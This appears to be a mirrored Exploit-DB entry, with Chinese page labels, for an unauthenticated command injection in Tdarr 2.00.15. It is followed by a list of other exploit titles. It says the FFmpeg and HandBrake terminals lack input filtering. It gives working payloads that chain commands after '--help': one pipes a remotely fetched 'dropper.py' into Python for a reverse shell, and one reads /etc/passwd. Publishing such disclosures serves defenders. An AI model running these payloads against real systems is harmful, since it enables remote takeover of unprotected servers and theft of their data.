Tdarr 2.00.15 – Command Injection

Exploit Database
18 阅读

作者： Sam Smith

日期： 2022-03-11
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50822/

# Exploit Title: Tdarr 2.00.15 - Command Injection
# Date: 10/03/2022
# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

last Exploits
Tdarr 2.00.15 – Command Injection的更多信息

Nagios XI – Authenticated Remote Command Execution (Metasploit)：
Madwifi – SIOCGIWSCAN Buffer Overflow (Metasploit)：
Samba 3.4.16/3.5.14/3.6.4 – SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)：
RealVNC 4.1.0/4.1.1 – Authentication Bypass：
Acritum Femitter Server 1.03 – Multiple Vulnerabilities：
Microsoft Windows Kerberos – ‘Pass The Ticket’ Replay Security Bypass：
MiniUPnPd 1.0 – Remote Stack Buffer Overflow Remote Code Execution (Metasploit)：
MyWebServer 1.0.3 – Arbitrary File Download：